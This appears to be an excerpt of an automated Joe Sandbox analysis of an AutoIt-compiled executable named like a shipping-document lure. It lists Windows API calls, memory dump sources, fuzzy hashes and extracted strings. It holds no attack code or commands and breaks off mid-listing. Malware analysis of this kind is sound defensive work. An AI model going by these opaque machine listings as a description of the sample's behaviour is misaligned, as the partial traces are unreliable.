                                                                • Instruction Fuzzy Hash: ACD1A1702043019BCB14EF11C656BAEBBE5AFD5764F148858FC865B3A2DB31EE0ACB41
                                                                APIs
                                                                • SetTextColor.GDI32(?,00000000), ref: 009BA630
                                                                • GetSysColorBrush.USER32(0000000F), ref: 009BA661
                                                                • GetSysColor.USER32(0000000F), ref: 009BA66D
                                                                • SetBkColor.GDI32(?,000000FF), ref: 009BA687
                                                                • SelectObject.GDI32(?,00000000), ref: 009BA696
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 009BA6C1
                                                                • GetSysColor.USER32(00000010), ref: 009BA6C9
                                                                • CreateSolidBrush.GDI32(00000000), ref: 009BA6D0
                                                                • FrameRect.USER32(?,?,00000000), ref: 009BA6DF
                                                                • DeleteObject.GDI32(00000000), ref: 009BA6E6
                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 009BA731
                                                                • FillRect.USER32(?,?,00000000), ref: 009BA763
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BA78E
                                                                  • Part of subcall function 009BA8CA: GetSysColor.USER32(00000012), ref: 009BA903
                                                                  • Part of subcall function 009BA8CA: SetTextColor.GDI32(?,?), ref: 009BA907
                                                                  • Part of subcall function 009BA8CA: GetSysColorBrush.USER32(0000000F), ref: 009BA91D
                                                                  • Part of subcall function 009BA8CA: GetSysColor.USER32(0000000F), ref: 009BA928
                                                                  • Part of subcall function 009BA8CA: GetSysColor.USER32(00000011), ref: 009BA945
                                                                  • Part of subcall function 009BA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009BA953
                                                                  • Part of subcall function 009BA8CA: SelectObject.GDI32(?,00000000), ref: 009BA964
                                                                  • Part of subcall function 009BA8CA: SetBkColor.GDI32(?,00000000), ref: 009BA96D
                                                                  • Part of subcall function 009BA8CA: SelectObject.GDI32(?,?), ref: 009BA97A
                                                                  • Part of subcall function 009BA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 009BA999
                                                                  • Part of subcall function 009BA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009BA9B0
                                                                  • Part of subcall function 009BA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 009BA9C5
                                                                  • Part of subcall function 009BA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009BA9ED
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 3521893082-0
                                                                • Opcode ID: f40461506e108406c5c81c2d9bfa9580e1bc97f4340d4fed9c562494e8f38afd
                                                                • Instruction ID: 35f6a7eba7b40b25b0925656bab45f142b1e1444a7081ea8ee6512f679efadf7
                                                                • Opcode Fuzzy Hash: f40461506e108406c5c81c2d9bfa9580e1bc97f4340d4fed9c562494e8f38afd
                                                                • Instruction Fuzzy Hash: A2917B7241C301FFCB109F64DE48AAB7BA9FB88331F100B29F962961A0DB71D944DB52
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?), ref: 00932CA2
                                                                • DeleteObject.GDI32(00000000), ref: 00932CE8
                                                                • DeleteObject.GDI32(00000000), ref: 00932CF3
                                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00932CFE
                                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00932D09
                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0096C43B
                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0096C474
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0096C89D
                                                                  • Part of subcall function 00931B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00932036,?,00000000,?,?,?,?,009316CB,00000000,?), ref: 00931B9A
                                                                • SendMessageW.USER32(?,00001053), ref: 0096C8DA
                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0096C8F1
                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0096C907
                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0096C912
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                • String ID: 0
                                                                • API String ID: 464785882-4108050209
                                                                • Opcode ID: 6515f34c5bda8b2ab56d266a1ca6eb1e5dad8f539f54b522309b95c16747cd27
                                                                • Instruction ID: 212e27918e40aac360de355173f8a0580902ce3570847f81bd24074307983253
                                                                • Opcode Fuzzy Hash: 6515f34c5bda8b2ab56d266a1ca6eb1e5dad8f539f54b522309b95c16747cd27
                                                                • Instruction Fuzzy Hash: A0126C70604201EFDB25CF24C998BB9B7E9BF45310F5485AAF896DB262C731E842DF91
                                                                APIs
                                                                • DestroyWindow.USER32(00000000), ref: 009A74DE
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009A759D
                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009A75DB
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009A75ED
                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009A7633
                                                                • GetClientRect.USER32(00000000,?), ref: 009A763F
                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009A7683
                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009A7692
                                                                • GetStockObject.GDI32(00000011), ref: 009A76A2
                                                                • SelectObject.GDI32(00000000,00000000), ref: 009A76A6
                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009A76B6
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A76BF
                                                                • DeleteDC.GDI32(00000000), ref: 009A76C8
                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009A76F4
                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 009A770B
                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009A7746
                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009A775A
                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 009A776B
                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009A779B
                                                                • GetStockObject.GDI32(00000011), ref: 009A77A6
                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009A77B1
                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009A77BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                • API String ID: 2910397461-517079104
                                                                • Opcode ID: f095772babf72f47368f3f54b9737a638a5b4884b2222f178f3c53f7669f4f1e
                                                                • Instruction ID: 4c186f8ca08d6cc10b2dfc70e977c81987cf621a6fdff50dd01d050d2ddf9f57
                                                                • Opcode Fuzzy Hash: f095772babf72f47368f3f54b9737a638a5b4884b2222f178f3c53f7669f4f1e
                                                                • Instruction Fuzzy Hash: A3A16F71A54609BFEB14DBA8DD5AFBEBBB9EB45710F014214FA14A72E0C670AD00DF60
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099AD1E
                                                                • GetDriveTypeW.KERNEL32(?,009BFAC0,?,\\.\,009BF910), ref: 0099ADFB
                                                                • SetErrorMode.KERNEL32(00000000,009BFAC0,?,\\.\,009BF910), ref: 0099AF59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DriveType
                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                • API String ID: 2907320926-4222207086
                                                                • Opcode ID: 2931168adc1f5ee01508a98c716623662838ba9c195a8291b6accca70a8193c2
                                                                • Instruction ID: 61bb7cef6723e2fa9e7d26b5ab34ebf60ac938f6778258515129a9b2e322b7c8
                                                                • Opcode Fuzzy Hash: 2931168adc1f5ee01508a98c716623662838ba9c195a8291b6accca70a8193c2
                                                                • Instruction Fuzzy Hash: 1F51F7F0648205EBCF10DB99C992DBEB3A5EB88704B644466F80BA7690CA709D01DB83
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                • API String ID: 1038674560-86951937
                                                                • Opcode ID: 0c5a3b5b6df1c9a5536b5353226aac1d04b1964943fb6d5ec5c51281288c61c9
                                                                • Instruction ID: b5e5dc0fb0e07b783c7089da49159f09cfd299e7aa4165ccb1f1a25ececa2861
                                                                • Opcode Fuzzy Hash: 0c5a3b5b6df1c9a5536b5353226aac1d04b1964943fb6d5ec5c51281288c61c9
                                                                • Instruction Fuzzy Hash: 6F81F4B060020ABACB21EB71DC53FBB776CAF85754F048025FD05AB196EB60DE45DBA1
                                                                APIs
                                                                • GetSysColor.USER32(00000012), ref: 009BA903
                                                                • SetTextColor.GDI32(?,?), ref: 009BA907
                                                                • GetSysColorBrush.USER32(0000000F), ref: 009BA91D
                                                                • GetSysColor.USER32(0000000F), ref: 009BA928
                                                                • CreateSolidBrush.GDI32(?), ref: 009BA92D
                                                                • GetSysColor.USER32(00000011), ref: 009BA945
                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 009BA953
                                                                • SelectObject.GDI32(?,00000000), ref: 009BA964
                                                                • SetBkColor.GDI32(?,00000000), ref: 009BA96D
                                                                • SelectObject.GDI32(?,?), ref: 009BA97A
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 009BA999
                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009BA9B0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 009BA9C5
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009BA9ED
                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009BAA14
                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 009BAA32
                                                                • DrawFocusRect.USER32(?,?), ref: 009BAA3D
                                                                • GetSysColor.USER32(00000011), ref: 009BAA4B
                                                                • SetTextColor.GDI32(?,00000000), ref: 009BAA53
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009BAA67
                                                                • SelectObject.GDI32(?,009BA5FA), ref: 009BAA7E
                                                                • DeleteObject.GDI32(?), ref: 009BAA89
                                                                • SelectObject.GDI32(?,?), ref: 009BAA8F
                                                                • DeleteObject.GDI32(?), ref: 009BAA94
                                                                • SetTextColor.GDI32(?,?), ref: 009BAA9A
                                                                • SetBkColor.GDI32(?,?), ref: 009BAAA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 1996641542-0
                                                                • Opcode ID: c3678c7070d28b863565c5d775f9a0dd6a38f0bf0d126ceffcadf101c36e8dcc
                                                                • Instruction ID: 7f31bfc56fa0bb5b509f2b8d46cb3ec46c3c72fcfae2d96612967f86f270b9c8
                                                                • Opcode Fuzzy Hash: c3678c7070d28b863565c5d775f9a0dd6a38f0bf0d126ceffcadf101c36e8dcc
                                                                • Instruction Fuzzy Hash: 70513B71914208FFDF109FA8DD48AEE7BB9EB48330F114625F911AB2A1D7759940EF90
                                                                APIs
                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009B8AC1
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B8AD2
                                                                • CharNextW.USER32(0000014E), ref: 009B8B01
                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009B8B42
                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009B8B58
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B8B69
                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009B8B86
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 009B8BD8
                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009B8BEE
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 009B8C1F
                                                                • _memset.LIBCMT ref: 009B8C44
                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009B8C8D
                                                                • _memset.LIBCMT ref: 009B8CEC
                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 009B8D16
                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 009B8D6E
                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 009B8E1B
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 009B8E3D
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009B8E87
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009B8EB4
                                                                • DrawMenuBar.USER32(?), ref: 009B8EC3
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 009B8EEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                • String ID: 0
                                                                • API String ID: 1073566785-4108050209
                                                                • Opcode ID: 10b4f104610e720637aedc05286d76a777bac3402d61ebd5715e6ff937790be6
                                                                • Instruction ID: 92016835e2787e7e80323fc00984eafec64de39d18f1d209e649fb141e0b28a9
                                                                • Opcode Fuzzy Hash: 10b4f104610e720637aedc05286d76a777bac3402d61ebd5715e6ff937790be6
                                                                • Instruction Fuzzy Hash: 6CE16D70914218ABDB20DF65CD84EFF7BBDEF49720F10815AF915AA290DB748A84DF60
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 009B49CA
                                                                • GetDesktopWindow.USER32 ref: 009B49DF
                                                                • GetWindowRect.USER32(00000000), ref: 009B49E6
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009B4A48
                                                                • DestroyWindow.USER32(?), ref: 009B4A74
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009B4A9D
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B4ABB
                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009B4AE1
                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 009B4AF6
                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009B4B09
                                                                • IsWindowVisible.USER32(?), ref: 009B4B29
                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009B4B44
                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009B4B58
                                                                • GetWindowRect.USER32(?,?), ref: 009B4B70
                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 009B4B96
                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 009B4BB0
                                                                • CopyRect.USER32(?,?), ref: 009B4BC7
                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 009B4C32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                • String ID: ($0$tooltips_class32
                                                                • API String ID: 698492251-4156429822
                                                                • Opcode ID: e8defb38d69bcb5ae388cd04bec5a254688d4b3e07f58f96cbd6dbc4ba508c01
                                                                • Instruction ID: a339ca6f1fca5f20fe9ecd9f4bdff681c689c332d8948ac412cd566b44a99cd6
                                                                • Opcode Fuzzy Hash: e8defb38d69bcb5ae388cd04bec5a254688d4b3e07f58f96cbd6dbc4ba508c01
                                                                • Instruction Fuzzy Hash: AEB18C71608340AFDB04DF64C984BAABBE4BF84720F008A1DF9999B292D771EC05DF55
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009328BC
                                                                • GetSystemMetrics.USER32(00000007), ref: 009328C4
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009328EF
                                                                • GetSystemMetrics.USER32(00000008), ref: 009328F7
                                                                • GetSystemMetrics.USER32(00000004), ref: 0093291C
                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00932939
                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00932949
                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0093297C
                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00932990
                                                                • GetClientRect.USER32(00000000,000000FF), ref: 009329AE
                                                                • GetStockObject.GDI32(00000011), ref: 009329CA
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 009329D5
                                                                  • Part of subcall function 00932344: GetCursorPos.USER32(?), ref: 00932357
                                                                  • Part of subcall function 00932344: ScreenToClient.USER32(009F57B0,?), ref: 00932374
                                                                  • Part of subcall function 00932344: GetAsyncKeyState.USER32(00000001), ref: 00932399
                                                                  • Part of subcall function 00932344: GetAsyncKeyState.USER32(00000002), ref: 009323A7
                                                                • SetTimer.USER32(00000000,00000000,00000028,00931256), ref: 009329FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                • String ID: AutoIt v3 GUI
                                                                • API String ID: 1458621304-248962490
                                                                • Opcode ID: 613efaee7f6fd69c3f3beed3422fedc8426c7aea53aa8d2a2fe0faa013129d0b
                                                                • Instruction ID: 2dfe13bbe41ac726b4a8bccb5058a8082224f299a2165cb57c79b3ddafd72c0a
                                                                • Opcode Fuzzy Hash: 613efaee7f6fd69c3f3beed3422fedc8426c7aea53aa8d2a2fe0faa013129d0b
                                                                • Instruction Fuzzy Hash: 6EB15A71A1420AEFDB14DFA8DD55BAE7BB4FB48320F114229FA15E72A0DB74A840DF50
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0098A47A
                                                                • __swprintf.LIBCMT ref: 0098A51B
                                                                • _wcscmp.LIBCMT ref: 0098A52E
                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0098A583
                                                                • _wcscmp.LIBCMT ref: 0098A5BF
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0098A5F6
                                                                • GetDlgCtrlID.USER32(?), ref: 0098A648
                                                                • GetWindowRect.USER32(?,?), ref: 0098A67E
                                                                • GetParent.USER32(?), ref: 0098A69C
                                                                • ScreenToClient.USER32(00000000), ref: 0098A6A3
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0098A71D
                                                                • _wcscmp.LIBCMT ref: 0098A731
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0098A757
                                                                • _wcscmp.LIBCMT ref: 0098A76B
                                                                  • Part of subcall function 0095362C: _iswctype.LIBCMT ref: 00953634
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                • String ID: %s%u
                                                                • API String ID: 3744389584-679674701
                                                                • Opcode ID: ba1994fee1e0d30dc95fde0266a4651cd41d14b8e686991b21ccfb94625775cf
                                                                • Instruction ID: 20ab8f6fa9890fc9cf7086a9244ebb283add0a69af63daa41fbeba5da7d59df0
                                                                • Opcode Fuzzy Hash: ba1994fee1e0d30dc95fde0266a4651cd41d14b8e686991b21ccfb94625775cf
                                                                • Instruction Fuzzy Hash: 58A1D631604706AFE714EF64C884FAAB7ECFF44354F00862AF999C2250DB34E955CB92
                                                                APIs
                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0098AF18
                                                                • _wcscmp.LIBCMT ref: 0098AF29
                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0098AF51
                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0098AF6E
                                                                • _wcscmp.LIBCMT ref: 0098AF8C
                                                                • _wcsstr.LIBCMT ref: 0098AF9D
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0098AFD5
                                                                • _wcscmp.LIBCMT ref: 0098AFE5
                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0098B00C
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0098B055
                                                                • _wcscmp.LIBCMT ref: 0098B065
                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0098B08D
                                                                • GetWindowRect.USER32(00000004,?), ref: 0098B0F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
